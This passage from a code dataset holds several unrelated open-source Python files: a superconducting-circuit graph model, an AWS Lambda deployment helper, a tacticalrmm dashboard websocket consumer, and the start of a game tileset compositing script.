\"Z\", # Resonator impedance\n \"g\" # Coupling term\n ]\n \n # Different subgraphs\n _subgraphs = [\n \"Circuit\",\n \"Conductive\",\n \"SCTree\",\n \"SCGraph\",\n \"Loop\"\n ]\n \n def __init__(self, circuit_name=\"\"):\n \"\"\"\n \"\"\"\n \n # Components associated with each branch\n self.components_map = {}\n \n # Charge bias associated with node\n self.charge_bias_nodes = {}\n \n # Flux bias associated with each loop\n self.flux_bias_edges = {}\n \n # All circuit loops map\n self.loops_map = {}\n \n # Edges shared between loops\n self.loop_adjacency_map = {}\n \n # Capacitively-coupled resonators\n self.resonators_cap = {}\n \n # Mutually coupled branches\n self.coupled_branches = {}\n \n # General undirected circuit graph\n self.circuit_graph = nx.MultiGraph(circuit_name=circuit_name)\n \n def addBranch(self, n1, n2, component):\n \"\"\"\n \"\"\"\n \n # Check there are no mutual inductors specified\n if component[0] == self._element_prefixes[4]:\n raise Exception(\"Cannot add a mutual inductance to a circuit branch.\")\n \n # Check the symbol is correct\n if component[0] not in self._element_prefixes:\n raise Exception(\"Invalid component symbol '%s', it should be one of %s.\" % (component[0], repr(self._element_prefixes)))\n \n # Add the branch\n k = self.circuit_graph.add_edge(n1, n2, component=component, label=component)\n \n # Update\n self._update_components_map()\n self._update_graphs()\n self._update_couplings_map((n1, n2, k))\n \n def coupleBranchesInductively(self, edge1, edge2, component):\n \"\"\"\n \"\"\"\n alt_edge1 = (edge1[1], edge1[0], edge1[2])\n alt_edge2 = (edge2[1], edge2[0], edge2[2])\n \n if 
edge1 not in self.sc_spanning_tree_wc.edges and alt_edge1 not in self.sc_spanning_tree_wc.edges:\n raise Exception(\"Edge %s is not in conductive circuit subgraph.\" % repr(edge1))\n if edge2 not in self.sc_spanning_tree_wc.edges and alt_edge2 not in self.sc_spanning_tree_wc.edges:\n raise Exception(\"Edge %s is not in conductive circuit subgraph.\" % repr(edge2))\n \n edge1 = alt_edge1 if edge1 not in self.sc_spanning_tree_wc.edges else edge1\n edge2 = alt_edge2 if edge2 not in self.sc_spanning_tree_wc.edges else edge2\n \n # Check the edges are inductive\n if self.isInductiveEdge(edge1) == False:\n raise Exception(\"The selected edge %s is not inductive.\" % repr(edge1))\n if self.isInductiveEdge(edge2) == False:\n raise Exception(\"The selected edge %s is not inductive.\" % repr(edge2))\n \n # Ensure component is a mutual inductance\n if component[0] != self._element_prefixes[4]:\n raise Exception(\"Branch coupling component must be a mutual inductance.\")\n \n self.coupled_branches[component] = (edge1, edge2)\n \n def coupleResonatorCapacitively(self, node, component):\n \"\"\"\n \"\"\"\n if node not in self.circuit_graph.nodes:\n raise Exception(\"Node %i not part of the circuit graph.\" % node)\n \n if node == 0:\n raise Exception(\"Cannot couple a resonator to the ground node of the circuit\")\n \n if self.resonators_cap[node] is not None:\n raise Exception(\"Node %i already has a resonator coupled to it (only one per node supported currently).\" % node)\n \n # Check there are no mutual inductors specified\n if component[0] != self._element_prefixes[0]:\n raise Exception(\"The resonator coupling element must be a capacitor.\")\n \n # Detect duplicates\n if component in self.components_map.values():\n raise Exception(\"Component %s already exists. 
Change the name of the component.\" % component)\n \n # Create the resonator capacitor and inductor symbols\n Cr = \"%s%ir\" % (self._element_prefixes[0], node)\n Lr = \"%s%ir\" % (self._element_prefixes[1], node)\n \n # Create the resonator frequency and impedance symbols\n fr = \"%s%ir\" % (self._resonator_prefixes[0], node) # This is the bare frequency\n Zr = \"%s%ir\" % (self._resonator_prefixes[1], node)\n \n # Create the Hamiltonian coupling term symbols\n gC = \"%s%ir\" % (self._resonator_prefixes[2], node)\n \n # Create the loaded resonator and impedance symbols\n frd = \"%s%irl\" % (self._resonator_prefixes[0], node)\n Zrd = \"%s%irl\" % (self._resonator_prefixes[1], node)\n \n self.resonators_cap[node] = {\n \"coupling\": component,\n \"fr\": fr,\n \"Zr\": Zr,\n \"Cr\": Cr,\n \"Lr\": Lr,\n \"gC\": gC,\n \"frl\": frd,\n \"Zrl\": Zrd\n }\n \n def removeAllResonators(self):\n \"\"\"\n \"\"\"\n for node in self.circuit_graph.nodes:\n self.resonators_cap[node] = None\n \n def coupleResonatorInductively(self, edge, component, frequency, impedance=50.0):\n \"\"\"\n \"\"\"\n pass\n \n def addFluxBias(self, edge, component, source_inductance=None):\n \"\"\"\n \"\"\"\n alt_edge = (edge[1], edge[0], edge[2])\n if edge not in self.sc_spanning_tree_wc.edges and alt_edge not in self.sc_spanning_tree_wc.edges:\n raise Exception(\"Edge %s is not in conductive circuit subgraph.\" % repr(edge))\n edge = alt_edge if edge not in self.sc_spanning_tree_wc.edges else edge\n \n # Ensure component is a mutual inductance\n if component[0] != self._element_prefixes[4]:\n raise Exception(\"Flux bias coupling component must be a mutual inductance.\")\n \n # Detect duplicates\n if component in self.components_map.values():\n raise Exception(\"Component %s already exists. Change the name of the component.\" % component)\n \n # Check the edge has an inductor\n if self.isInductiveEdge(edge) == False:\n raise Exception(\"The selected edge %s is not inductive.\" % repr(edge))\n \n # Save it\n self.flux_bias_edges[edge] = component\n \n # FIXME: For now we assume the source inductance is the same as the in-circuit inductance.\n \n def addChargeBias(self, node, component):\n \"\"\"\n \"\"\"\n if node not in self.circuit_graph.nodes:\n raise Exception(\"Node %i not part of the circuit graph.\" % node)\n \n # Ensure component is a capacitor\n if component[0] != self._element_prefixes[0]:\n raise Exception(\"Charge bias coupling component must be a capacitor.\")\n \n # Detect duplicates\n if component in self.components_map.values():\n raise Exception(\"Component %s already exists. 
Change the name of the component.\" % component)\n \n self.charge_bias_nodes[node] = component\n \n def isCapacitiveEdge(self, edge):\n cstr = self.components_map[edge]\n if cstr[0] == self._element_prefixes[0]:\n return True\n return False\n \n def isInductiveEdge(self, edge):\n cstr = self.components_map[edge]\n if cstr[0] == self._element_prefixes[1]:\n return True\n return False\n \n def isJosephsonEdge(self, edge):\n cstr = self.components_map[edge]\n if cstr[0] == self._element_prefixes[2]:\n return True\n return False\n \n def isPhaseSlipEdge(self, edge):\n cstr = self.components_map[edge]\n if cstr[0] == self._element_prefixes[3]:\n return True\n return False\n \n def getCapacitiveEdges(self):\n edges_map = {v: k for k, v in self.components_map.items()}\n ret = {}\n for c, edge in edges_map.items():\n if c[0] == self._element_prefixes[0]:\n ret[c] = edge\n return ret\n \n def getInductiveEdges(self):\n edges_map = {self.components_map[k]: k for k in self.sc_spanning_tree_wc.edges}\n ret = {}\n for c, edge in edges_map.items():\n if c[0] == self._element_prefixes[1]:\n ret[c] = edge\n return ret\n \n def getJosephsonEdges(self):\n edges_map = {self.components_map[k]: k for k in self.sc_spanning_tree_wc.edges}\n ret = {}\n for c, edge in edges_map.items():\n if c[0] == self._element_prefixes[2]:\n ret[c] = edge\n return ret\n \n def getPhaseSlipEdges(self):\n edges_map = {self.components_map[k]: k for k in self.sc_spanning_tree_wc.edges}\n ret = {}\n for c, edge in edges_map.items():\n if c[0] == self._element_prefixes[3]:\n ret[c] = edge\n return ret\n \n def getComponentEdge(self, component):\n if component not in self.components_map.values():\n raise Exception(\"Component %s does not exist.\" % component)\n \n # Capacitive edges are not directional\n if component[0] == self._element_prefixes[0]:\n edges_map = {v: k for k, v in self.components_map.items()}\n return edges_map[component]\n \n # Other edges are directional\n edges_map = {self.components_map[k]: k for k in self.sc_spanning_tree_wc.edges}\n return edges_map[component]\n \n def getLoopsFromClosureBranch(self, edge):\n if edge not in self.closure_branches:\n raise Exception(\"Edge %s not a closure branch.\" % repr(edge))\n \n loop_keys = []\n for key, loop_edges in self.sc_loops.items():\n if edge in loop_edges:\n loop_keys.append(key)\n return loop_keys\n \n def getEdgesSharedWithLoop(self, loop_key):\n if loop_key not in self.sc_loops.keys():\n raise Exception(\"No loop key %i available.\" % loop_key)\n \n # Get the loops connected to this loop and save their edges\n loop_edges = set(self.sc_loops[loop_key])\n edges = set(self.sc_loops[loop_key])\n for key, loop in self.sc_loops.items():\n if key == loop_key:\n continue\n \n if not loop_edges.isdisjoint(set(loop)):\n edges |= set(loop)\n return edges\n \n #\n # DRAWING\n #\n \n def drawGraphViz(self, graph='Circuit', filename=None, format='svg'):\n if graph not in self._subgraphs:\n raise Exception(\"Invalid subgraph type '%s'.\" % graph)\n \n if graph == \"Circuit\":\n G = self.circuit_graph\n elif graph == \"Conductive\":\n G = self.circuit_conductive_graph\n elif graph == \"SCTree\":\n G = self.sc_spanning_tree\n elif graph == \"SCGraph\":\n G = self.sc_spanning_tree_wc\n elif graph == \"Loop\":\n G = self.loop_graph\n \n # Get the pydot graph\n pd_graph = nx.nx_pydot.to_pydot(G)\n \n # Compile the graphviz source\n gv_graph = gv.Source(pd_graph.create(format='dot').decode('utf8'))\n \n # Return the object, which should be rendered in a jupyter notebook\n if filename 
is None:\n return gv_graph\n \n # Save to file in specified format\n \n #\n # INTERNAL\n #\n def _update_graphs(self):\n self._get_conductive_graph()\n self._get_virtual_grounds()\n self._get_spanning_tree()\n self._get_sc_circuit()\n self._get_sc_loops()\n self._get_closure_branches()\n self._get_loop_graph()\n \n def _update_components_map(self):\n # Get all components keyed by edge\n self.components_map = nx.get_edge_attributes(self.circuit_graph, \"component\")\n \n # Detect duplicates\n tmp = list(set(self.components_map.values()))\n if len(tmp) != len(self.components_map.values()):\n raise Exception(\"Duplicate component detected. Change the name of the component.\")\n \n # Reverse the keys for convenience, use more memory rather than complicating later code\n tmp = {}\n for k, v in self.components_map.items():\n tmp[(k[1], k[0], k[2])] = v\n self.components_map.update(tmp)\n \n def _update_couplings_map(self, edge):\n n1, n2, k = edge\n if n1 not in self.charge_bias_nodes.keys():\n self.charge_bias_nodes[n1] = None\n if n2 not in self.charge_bias_nodes.keys():\n self.charge_bias_nodes[n2] = None\n if (n1, n2, k) not in self.flux_bias_edges.keys():\n self.flux_bias_edges[(n1, n2, k)] = None\n if (n2, n1, k) not in self.flux_bias_edges.keys():\n self.flux_bias_edges[(n2, n1, k)] = None\n if n1 not in self.resonators_cap.keys():\n self.resonators_cap[n1] = None\n if n2 not in self.resonators_cap.keys():\n self.resonators_cap[n2] = None\n \n def _get_conductive_graph(self):\n labels = nx.get_edge_attributes(self.circuit_graph, \"label\")\n self.circuit_conductive_graph = nx.MultiGraph()\n \n # Add all nodes\n self.circuit_conductive_graph.add_nodes_from(self.circuit_graph.nodes)\n \n # Ignore edges containing only capacitors\n for edge, component in nx.get_edge_attributes(self.circuit_graph, \"component\").items():\n if component[0] == self._element_prefixes[0]:\n continue\n self.circuit_conductive_graph.add_edge(edge[0], edge[1], key=edge[2],\n component=component, label=labels[edge])\n \n def _get_virtual_grounds(self):\n labels = nx.get_edge_attributes(self.circuit_conductive_graph, \"label\")\n # Get connected graphs\n connected = [self.circuit_conductive_graph.subgraph(c).copy()\\\n for c in nx.connected_components(self.circuit_conductive_graph)]\n \n # Get virtual grounds\n self.virtual_grounds = {}\n for subG in connected:\n \n # If only one node, it is a virtual ground\n if len(subG.nodes) == 1:\n n = list(subG.nodes)[0]\n S = nx.MultiDiGraph()\n S.add_node(n)\n self.virtual_grounds[n] = ([], S)\n \n # Get spanning tree of subgraph\n G = nx.minimum_spanning_tree(subG)\n\n # Construct the spanning tree part of the sub\n S = nx.MultiDiGraph()\n for edge in G.edges:\n S.add_edge(edge[0], edge[1], key=edge[2], edge_type=\"S\", label=labels[edge])\n\n # Get closure branches, i.e. 
those that do not appear in the spanning tree\n closure_edges = list(set(subG.edges) - set(S.edges))\n for i, edge in enumerate(closure_edges):\n closure_edges[i] = (edge[1], edge[0], edge[2]) # reverse edge to preserve flow order\n\n # Find nodes with 0 in_degree\n for n, d in S.in_degree:\n if d == 0:\n self.virtual_grounds[n] = (closure_edges, S)\n break\n \n def _get_spanning_tree(self):\n S = nx.union_all([S for c, S in self.virtual_grounds.values()])\n labels = nx.get_edge_attributes(self.circuit_conductive_graph, \"label\")\n \n # As the node order may have been changed, reconstruct the graph\n self.sc_spanning_tree = nx.MultiDiGraph()\n self.sc_spanning_tree.add_nodes_from(self.circuit_conductive_graph.nodes)\n for edge in S.edges:\n self.sc_spanning_tree.add_edge(edge[0], edge[1], key=edge[2], edge_type=\"S\", label=labels[edge])\n \n def _get_sc_circuit(self):\n labels = nx.get_edge_attributes(self.circuit_conductive_graph, \"label\")\n self.sc_spanning_tree_wc = self.sc_spanning_tree.copy()\n for c, S in self.virtual_grounds.values():\n for edge in c:\n edger = (edge[1], edge[0], edge[2])\n label = labels[edger] if edge not in labels.keys() else labels[edge]\n self.sc_spanning_tree_wc.add_edge(edge[0], edge[1], key=edge[2], edge_type=\"C\", label=label)\n \n def _get_sc_loops(self):\n c = 0\n self.sc_loops = {}\n for source_node, spanning in self.virtual_grounds.items():\n closure_edges, S = spanning\n\n for edge in closure_edges:\n self.sc_loops[c] = []\n try:\n p1 = sorted(nx.all_simple_edge_paths(S, source_node, edge[0]))[0]\n p2 = sorted(nx.all_simple_edge_paths(S, source_node, edge[1]))[0]\n self.sc_loops[c].extend(list(set(p1)^set(p2)))\n except IndexError:\n self.sc_loops[c].extend(list(p1))\n\n self.sc_loops[c].append(edge)\n c+=1\n \n def _get_closure_branches(self):\n self.closure_branches = []\n for closure_edges, S in self.virtual_grounds.values():\n self.closure_branches.extend(closure_edges)\n \n def _get_loop_graph(self):\n loop_graph_nodes = {}\n loop_graph_edges = {}\n multi_edges = set()\n counter = 0\n\n # Find the 2-node loops\n counter_dict = {}\n loop_c = 0\n for edge in self.circuit_graph.edges:\n key = (edge[0], edge[1])\n if key in counter_dict.keys():\n counter_dict[key].append(edge)\n else:\n counter_dict[key] = [edge]\n duplicates_dict = {k: v for k, v in counter_dict.items() if len(v) > 1}\n loop_graph_nodes = {}\n counter = 0\n \n for k, v in duplicates_dict.items():\n for i in range(len(v)-1):\n loop_graph_nodes[counter] = [v[i], v[i+1]]\n counter += 1\n\n # Keep a set of multi-edges\n multi_edges.update(v)\n \n # Reduce multigraph to simple graph by removing edge duplicates\n G = nx.Graph()\n G.add_edges_from(list(set([(e[0],e[1]) for e in self.circuit_graph.edges])))\n\n # Update the loops data with longer-node loops\n multi_edges_used = set()\n #for cycle in nx.minimum_cycle_basis(G):\n for cycle in nx.cycle_basis(G): # FIXME: This preserves node order but doesn't use minimum weight cycles.\n \n # Last edge nodes are reversed to preserve ordering of multigraph\n edges = [(cycle[i], cycle[i+1], 0) if i < len(cycle)-1 else (cycle[(i+1)%len(cycle)], cycle[i], 0) for i in range(len(cycle))]\n \n # Sort the edge nodes\n edges = [(e[0], e[1], e[2]) if e[0] < e[1] else (e[1], e[0], e[2]) for e in edges]\n\n # Check if a multi-edge has already appeared\n for i, edge in enumerate(edges):\n if edge in multi_edges_used:\n # Increment the multi-edge index\n edges[i] = (edge[0], edge[1], edge[2]+1)\n else:\n # Add the edge to the list if it's a multi-edge\n 
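# Editor's note (added comment, not in the original file): this branch records the first use of a parallel edge,\n # keeping key 0; subsequent appearances take the branch above, which bumps the key so that every loop\n # references a distinct (node1, node2, key) edge of the multigraph.\n 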
if edge in multi_edges:\n multi_edges_used.add(edge)\n multi_edges.remove(edge)\n\n loop_graph_nodes[counter] = edges\n counter += 1\n\n # Now find the edges in common between loops\n # Exploits the ordering of nodes in multigraph edges\n for i in range(counter-1):\n for j in range(i+1, counter, 1):\n l1 = loop_graph_nodes[i]\n l2 = loop_graph_nodes[j]\n\n edges = []\n for k in l1:\n if k in l2:\n edges.append(k)\n if len(edges) > 0:\n loop_graph_edges[(i, j)] = edges\n\n # Remove the edges in common between loops from the node attributes\n #for ke, ve in loop_graph_edges.items():\n # for v in ve:\n # loop_graph_nodes[ke[0]].remove(v)\n # loop_graph_nodes[ke[1]].remove(v)\n \n # Save the loop data\n self.loops_map = loop_graph_nodes\n self.loop_adjacency_map = loop_graph_edges\n \n # Create the loop graph\n self.loop_graph = nx.Graph()\n for k, v in loop_graph_nodes.items():\n self.loop_graph.add_node(k, circuit_edges=v)\n\n for k, v in loop_graph_edges.items():\n self.loop_graph.add_edge(k[0], k[1], circuit_edges=v)\n \n","repo_name":"Paul-Warburton-Research-Group/pycqed","sub_path":"src/pycqed/circuit_graph.py","file_name":"circuit_graph.py","file_ext":"py","file_size_in_byte":21139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71392661586","text":"import subprocess\r\nimport os\r\nimport importlib.util\r\nimport time\r\nimport handler\r\n\r\n#Update Lambda Function\r\n\r\n\r\nclass Script():\r\n\r\n #TO DO ''\r\n\r\n rootScripts = handler.find_root_dir()\r\n defaultLambdaName = os.path.basename(rootScripts)\r\n defaultKeyName = defaultLambdaName + '.zip'\r\n defaultZipFile = rootScripts + '/' + defaultKeyName\r\n defaultBucketName = \"lambda-functions-kolserdav\"\r\n defaultPublish = 'y'\r\n zipFile = ''\r\n publish = ''\r\n nameLambda = ''\r\n bucketName = ''\r\n keyName = ''\r\n result = ''\r\n\r\n def script(self):\r\n self.nameLambda = input('Lambda function name: <' + self.defaultLambdaName + '>: ')\r\n if '.' in self.defaultLambdaName:\r\n self.defaultLambdaName = self.defaultLambdaName.replace('.', '-')\r\n self.zipFile = input('Zip file <' + self.defaultZipFile + '>: ')\r\n self.publish = input('Publish function <' + self.defaultPublish + '>: ')\r\n self.bucketName = input(\"S3Bucket Lambda code name <\" + self.defaultBucketName + \">: \")\r\n self.keyName = input(\"S3Bucket Lambda code key <\" + self.defaultKeyName + \">: \")\r\n if self.nameLambda == '':\r\n self.nameLambda = self.defaultLambdaName\r\n if self.zipFile == '':\r\n self.zipFile = self.defaultZipFile\r\n self.result = 's3'\r\n if self.publish == '':\r\n self.publish = self.defaultPublish\r\n if self.publish.lower() == 'y':\r\n self.publish = '--publish'\r\n else:\r\n self.publish = '--no-publish'\r\n if self.bucketName == '':\r\n self.bucketName = self.defaultBucketName\r\n if self.keyName == '':\r\n self.keyName = self.defaultKeyName\r\n bucket_request = \"aws s3api put-object --acl private --bucket \" + self.bucketName + ' --key ' + \\\r\n self.nameLambda + '.zip' + ' --body ' + self.zipFile\r\n if not subprocess.check_output(bucket_request, shell=True):\r\n return print('Error 010: S3 put-object request returned no output')\r\n call_body_zip = 'aws lambda update-function-code --function-name ' + self.nameLambda + ' --zip-file ' + self.zipFile + \\\r\n ' ' + self.publish\r\n call_body_s3 = 'aws lambda update-function-code --function-name ' + self.nameLambda + ' --s3-bucket ' + self.bucketName + \\\r\n ' --s3-key ' 
+ self.keyName + ' ' + self.publish\r\n if self.result == 's3':\r\n result = subprocess.call(call_body_s3, shell=True)\r\n else:\r\n result = subprocess.call(call_body_zip, shell=True)\r\n\r\n return 0\r\n\r\n\r\n","repo_name":"kolserdav/aws-cli-lambda-scripts","sub_path":"update-lambda/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39610213437","text":"import asyncio\nfrom contextlib import suppress\n\nfrom channels.db import database_sync_to_async\nfrom channels.generic.websocket import AsyncJsonWebsocketConsumer\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.db.models import F\nfrom django.utils import timezone as djangotime\n\nfrom agents.models import Agent\nfrom tacticalrmm.constants import AgentMonType\nfrom tacticalrmm.helpers import days_until_cert_expires\n\n\nclass DashInfo(AsyncJsonWebsocketConsumer):\n async def connect(self):\n self.user = self.scope[\"user\"]\n\n if isinstance(self.user, AnonymousUser):\n await self.close()\n\n await self.accept()\n self.connected = True\n self.dash_info = asyncio.create_task(self.send_dash_info())\n\n async def disconnect(self, close_code):\n with suppress(Exception):\n self.dash_info.cancel()\n\n self.connected = False\n\n async def receive_json(self, payload, **kwargs):\n pass\n\n @database_sync_to_async\n def get_dashboard_info(self):\n total_server_agents_count = (\n Agent.objects.filter_by_role(self.user)\n .filter(monitoring_type=AgentMonType.SERVER)\n .count()\n )\n offline_server_agents_count = (\n Agent.objects.filter_by_role(self.user)\n .filter(monitoring_type=AgentMonType.SERVER)\n .filter(\n last_seen__lt=djangotime.now()\n - (djangotime.timedelta(minutes=1) * F(\"offline_time\"))\n )\n .count()\n )\n total_workstation_agents_count = (\n Agent.objects.filter_by_role(self.user)\n .filter(monitoring_type=AgentMonType.WORKSTATION)\n .count()\n )\n offline_workstation_agents_count = (\n Agent.objects.filter_by_role(self.user)\n .filter(monitoring_type=AgentMonType.WORKSTATION)\n .filter(\n last_seen__lt=djangotime.now()\n - (djangotime.timedelta(minutes=1) * F(\"offline_time\"))\n )\n .count()\n )\n\n return {\n \"total_server_offline_count\": offline_server_agents_count,\n \"total_workstation_offline_count\": offline_workstation_agents_count,\n \"total_server_count\": total_server_agents_count,\n \"total_workstation_count\": total_workstation_agents_count,\n \"days_until_cert_expires\": days_until_cert_expires(),\n }\n\n async def send_dash_info(self):\n while self.connected:\n c = await self.get_dashboard_info()\n await self.send_json(c)\n await asyncio.sleep(30)\n","repo_name":"amidaware/tacticalrmm","sub_path":"api/tacticalrmm/core/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":2312,"dataset":"github-code","pt":"48"} +{"seq_id":"7975821650","text":"#!/usr/bin/env python3\n\n# compose.py\n# Split a gfx directory made of 1000s of little images and files\n# into a set of tilesheets and a tile_config.json\n\n\"\"\"Merge all individal tile_entries and pngs in a tileset's directory\ninto a tile_config.json and 1 or more tilesheet pngs.\n\"\"\"\n\nimport argparse\nimport json\nimport os\nimport subprocess\nimport sys\n\ntry:\n import pyvips\n Vips = pyvips\nexcept ImportError:\n import gi\n gi.require_version('Vips', '8.0')\n from gi.repository import Vips\n\nFALLBACK = {\n 
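# Editor's note (added comment, not in the original file): each entry below covers one 256-glyph block of the\n # fallback sheet; offsets advance by 256 per bold/colour variant, 16 variants in total.\n 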
\"file\": \"fallback.png\",\n \"tiles\": [],\n \"ascii\": [\n {\"offset\": 0, \"bold\": False, \"color\": \"BLACK\"},\n {\"offset\": 256, \"bold\": True, \"color\": \"WHITE\"},\n {\"offset\": 512, \"bold\": False, \"color\": \"WHITE\"},\n {\"offset\": 768, \"bold\": True, \"color\": \"BLACK\"},\n {\"offset\": 1024, \"bold\": False, \"color\": \"RED\"},\n {\"offset\": 1280, \"bold\": False, \"color\": \"GREEN\"},\n {\"offset\": 1536, \"bold\": False, \"color\": \"BLUE\"},\n {\"offset\": 1792, \"bold\": False, \"color\": \"CYAN\"},\n {\"offset\": 2048, \"bold\": False, \"color\": \"MAGENTA\"},\n {\"offset\": 2304, \"bold\": False, \"color\": \"YELLOW\"},\n {\"offset\": 2560, \"bold\": True, \"color\": \"RED\"},\n {\"offset\": 2816, \"bold\": True, \"color\": \"GREEN\"},\n {\"offset\": 3072, \"bold\": True, \"color\": \"BLUE\"},\n {\"offset\": 3328, \"bold\": True, \"color\": \"CYAN\"},\n {\"offset\": 3584, \"bold\": True, \"color\": \"MAGENTA\"},\n {\"offset\": 3840, \"bold\": True, \"color\": \"YELLOW\"}\n ]\n}\n\nERROR_LOGGED = False\n\n\ndef write_to_json(pathname, data):\n with open(pathname, \"w\") as fp:\n json.dump(data, fp)\n\n json_formatter = \"./tools/format/json_formatter.cgi\"\n if os.path.isfile(json_formatter):\n cmd = [json_formatter, pathname]\n subprocess.call(cmd)\n\n\ndef find_or_make_dir(pathname):\n try:\n os.stat(pathname)\n except OSError:\n os.mkdir(pathname)\n\n\nclass PngRefs(object):\n '''\n Sprites handling and referenced images memory\n '''\n def __init__(self, source_dir, output_dir):\n # dict of pngnames to png numbers; used to control uniqueness\n self.pngname_to_pngnum = {\"null_image\": 0}\n # dict of png absolute numbers to png names\n self.pngnum_to_pngname = {0: \"null_image\"}\n self.pngnum = 0\n self.referenced_pngnames = []\n self.source_dir = source_dir\n self.output_dir = output_dir\n\n if not os.access(self.source_dir, os.R_OK) \\\n or not os.path.isdir(self.source_dir):\n sys.exit(f'Error: cannot open directory {self.source_dir}')\n\n self.processed_ids = []\n tileset_info_path = os.path.join(self.source_dir, 'tile_info.json')\n self.tileset_width = 16\n self.tileset_height = 16\n self.tileset_info = [{}]\n if not os.access(tileset_info_path, os.R_OK):\n sys.exit(f'Error: cannot open {tileset_info_path}')\n with open(tileset_info_path, \"r\") as fp:\n self.tileset_info = json.load(fp)\n self.tileset_width = self.tileset_info[0].get(\"width\")\n self.tileset_height = self.tileset_info[0].get(\"height\")\n\n def convert_a_pngname_to_pngnum(self, sprite_id, entry):\n if sprite_id and sprite_id != \"no_entry\":\n new_id = self.pngname_to_pngnum.get(sprite_id, 0)\n if new_id:\n entry.append(new_id)\n if sprite_id not in self.referenced_pngnames:\n self.referenced_pngnames.append(sprite_id)\n return True\n else:\n print(\"Error: sprite id '{}'\".format(sprite_id) +\n \" has no matching PNG file.\"\n \" It will not be added to tile_config.json\")\n global ERROR_LOGGED\n ERROR_LOGGED = True\n return False\n\n def convert_pngname_to_pngnum(self, index):\n new_index = []\n if isinstance(index, list):\n for pngname in index:\n if isinstance(pngname, dict):\n sprite_ids = pngname.get(\"sprite\")\n valid = False\n new_sprites = []\n if isinstance(sprite_ids, list):\n new_sprites = []\n for sprite_id in sprite_ids:\n valid |= self.convert_a_pngname_to_pngnum(\n sprite_id, new_sprites)\n pngname[\"sprite\"] = new_sprites\n else:\n valid = self.convert_a_pngname_to_pngnum(\n sprite_ids, new_sprites)\n if valid:\n pngname[\"sprite\"] = new_sprites[0]\n if valid:\n 
new_index.append(pngname)\n else:\n self.convert_a_pngname_to_pngnum(pngname, new_index)\n else:\n self.convert_a_pngname_to_pngnum(index, new_index)\n if new_index and len(new_index) == 1:\n return new_index[0]\n return new_index\n\n def convert_tile_entry(self, tile_entry, prefix, is_filler):\n '''\n Compile input JSON into objects for the output JSON config\n '''\n tile_id = tile_entry.get(\"id\")\n id_as_prefix = None\n if tile_id:\n if not isinstance(tile_id, list):\n tile_id = [tile_id]\n id_as_prefix = tile_id[0] + \"_\"\n\n if is_filler:\n for an_id in tile_id:\n full_id = prefix + an_id\n if full_id in self.processed_ids:\n print(\"Info: skipping filler for {}\".format(full_id))\n return None\n fg_id = tile_entry.get(\"fg\")\n if fg_id:\n tile_entry[\"fg\"] = self.convert_pngname_to_pngnum(fg_id)\n else:\n del tile_entry[\"fg\"]\n\n bg_id = tile_entry.get(\"bg\")\n if bg_id:\n tile_entry[\"bg\"] = self.convert_pngname_to_pngnum(bg_id)\n else:\n try:\n del tile_entry[\"bg\"]\n except Exception:\n print(\"Error: Cannot find bg\" +\n \" for tile with id {}\".format(tile_id))\n global ERROR_LOGGED\n ERROR_LOGGED = True\n\n add_tile_entrys = tile_entry.get(\"additional_tiles\", [])\n for add_tile_entry in add_tile_entrys:\n self.convert_tile_entry(add_tile_entry, id_as_prefix, is_filler)\n\n if fg_id or bg_id:\n for an_id in tile_id:\n full_id = prefix + an_id\n if full_id not in self.processed_ids:\n self.processed_ids.append(full_id)\n return tile_entry\n return None # TODO: option to warn\n\n def find_unused(self, use_all=False):\n '''\n Find unused images and either warn about them or return the list\n '''\n unused = dict()\n for pngname, pngnum in self.pngname_to_pngnum.items():\n if pngnum and pngname not in self.referenced_pngnames:\n if use_all:\n unused[pngname] = pngnum\n else:\n print(\n \"Warning: image filename '{}' index '{}' was not used \"\n \"in any tile_config.json entries\"\n .format(pngname, pngnum))\n return unused\n\n\nclass TilesheetData(object):\n '''\n Tilesheet reading and compositing\n '''\n def __init__(self, subdir_index, refs):\n ts_all = refs.tileset_info[subdir_index]\n self.ts_specs = {}\n for ts_name, ts_spec in ts_all.items():\n self.ts_specs = ts_spec\n self.ts_name = ts_name\n break\n self.output = os.path.join(refs.output_dir, self.ts_name)\n self.tile_entries = []\n self.row_num = 0\n self.width = self.ts_specs.get(\"sprite_width\", refs.tileset_width)\n self.height = self.ts_specs.get(\"sprite_height\", refs.tileset_height)\n self.offset_x = 0\n self.offset_y = 0\n subdir_name = (\n self.ts_name.split(\".png\")[0] +\n \"_{}x{}\".format(self.width, self.height))\n self.subdir_path = os.path.join(refs.source_dir, 'pngs_' + subdir_name)\n self.offset_x = self.ts_specs.get(\"sprite_offset_x\", 0)\n self.offset_y = self.ts_specs.get(\"sprite_offset_y\", 0)\n self.null_image = Vips.Image.grey(self.width, self.height)\n self.row_pngs = [\"null_image\"]\n self.filler = False\n self.fallback = False\n if self.ts_specs.get(\"fallback\"):\n self.fallback = True\n return\n if self.ts_specs.get(\"filler\"):\n self.filler = True\n return\n\n def set_first_index(self, refs):\n '''\n Increment global index and set local indexes.\n Global index can be decremented later if tilesheet does not contain\n any output images.\n '''\n refs.pngnum += 1\n self.first_index = refs.pngnum\n self.max_index = refs.pngnum\n\n def is_standard(self, refs):\n '''\n Check whether output object needs a non-standard size or offset config\n '''\n if self.offset_x or self.offset_y:\n 
return False\n if self.width != refs.tileset_width:\n return False\n if self.height != refs.tileset_height:\n return False\n return True\n\n def merge_row(self, refs):\n spacer = 16 - len(self.row_pngs)\n refs.pngnum += spacer\n\n in_list = []\n\n for png_pathname in self.row_pngs:\n if png_pathname == \"null_image\":\n in_list.append(self.null_image)\n else:\n vips_image = Vips.Image.pngload(png_pathname)\n try:\n if not vips_image.hasalpha():\n vips_image = vips_image.addalpha()\n except Vips.Error:\n pass\n\n try:\n if vips_image.get_typeof(\"icc-profile-data\") != 0:\n vips_image = vips_image.icc_transform(\"srgb\")\n except Vips.Error:\n pass\n\n if (vips_image.width != self.width or\n vips_image.height != self.height):\n size_msg = \"Error: {} is {}x{}, sheet sprites are {}x{}.\"\n print(size_msg.format(\n png_pathname,\n vips_image.width, vips_image.height,\n self.width, self.height))\n print(\"\\tsprites in the {}\".format(self.ts_name) +\n \" tilesheet may be resized.\")\n print(\"\\tAll sprites in a tilesheet directory\" +\n \" should have the same dimensions.\")\n global ERROR_LOGGED\n ERROR_LOGGED = 